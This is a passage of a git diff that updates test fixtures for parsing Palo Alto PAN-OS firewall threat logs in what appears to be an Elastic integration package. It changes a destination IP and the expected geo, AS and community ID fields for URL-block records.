16:44:59,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28433,1,53097,443,34769,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7774,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28380,1,53099,443,22486,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7775,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28363,1,53100,443,12894,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7776,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28349,1,53101,443,62348,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7777,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28411,1,53104,443,6224,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7778,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28397,1,53107,443,44120,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7779,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28347,1,53108,443,44228,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7780,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28443,1,53109,443,31322,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7781,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:14 PA-220 1,2018/11/30 16:45:13,012801096514,THREAT,url,2049,2018/11/30 16:45:13,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:13,28439,1,53118,443,1672,443,0x403000,tcp,block-url,"www.googleadservices.com/",(9999),business-and-economy,informational,client-to-server,7782,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,25958,1,53126,443,20801,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7783,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28429,1,53127,443,24533,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7784,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28465,1,53128,443,30150,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7785,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28504,1,53129,443,36305,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7786,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28458,1,53130,443,42682,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7787,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28491,1,53131,443,22530,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7788,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28520,1,53132,443,43713,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7789,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28335,1,53133,443,60608,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7790,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28414,1,53134,443,9302,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7791,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:17 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28488,1,53135,443,11634,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7792,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28469,1,53152,443,30818,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7793,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28556,1,53155,443,64260,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7794,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28558,1,53158,443,7071,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7795,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28531,1,53160,443,4512,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7796,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28580,1,53161,443,3422,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7797,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28477,1,53162,443,4651,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7798,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28484,1,53163,443,19068,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7799,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28609,1,53164,443,5831,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7800,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28564,1,53165,443,7084,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7801,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28542,1,53166,443,18633,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7802,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:28 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28590,1,53167,443,25557,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7803,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:28 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28455,1,53150,443,20661,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7804,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28585,1,53185,443,65438,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7805,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28462,1,53187,443,53101,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7806,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28839,1,53188,443,35463,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7807,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:30 PA-220 1,2018/11/30 16:45:29,012801096514,THREAT,url,2049,2018/11/30 16:45:29,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:29,28400,1,53178,443,45769,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7808,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log-expected.json index 91d6ee4106b..a84a1cb8b94 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log-expected.json +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log-expected.json @@ -7,26 +7,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -42,14 +44,14 @@ "port": 52984, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -64,7 +66,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:qjpdroY6VaRSEUbSXzSWtUX00kc=" + "community_id": "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" } }, "threat_category": "unknown", @@ -109,8 +111,8 @@ ], "network": { "community_id": [ - "1:mDxnuNGkonQEEYcMT0Dur/FCt/I=", - "1:qjpdroY6VaRSEUbSXzSWtUX00kc=" + "1:uw+iNVMmjYN9VAmQZQDw4+dyarA=", + "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" ], "transport": "tcp", "application": "ssl", @@ -149,14 +151,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767671382Z", - "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691648800Z", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -179,26 +181,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -214,14 +218,14 @@ "port": 52983, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28219,1,52983,443,28249,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7727,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28219,1,52983,443,28249,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7727,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -236,7 +240,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:j6so5fl9DGKhDhaNmjI+6ipOFyc=" + "community_id": "1:k1x5UnaWY0lsTQok3Dy7GeOoceQ=" } }, "threat_category": "unknown", @@ -281,8 +285,8 @@ ], "network": { "community_id": [ - "1:svoGHRUXQeOT1QlGYhMbEalRiPU=", - "1:j6so5fl9DGKhDhaNmjI+6ipOFyc=" + "1:yRQhf+DxJ0lORwS6v0rca3ifDxU=", + "1:k1x5UnaWY0lsTQok3Dy7GeOoceQ=" ], "transport": "tcp", "application": "ssl", @@ -321,14 +325,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, 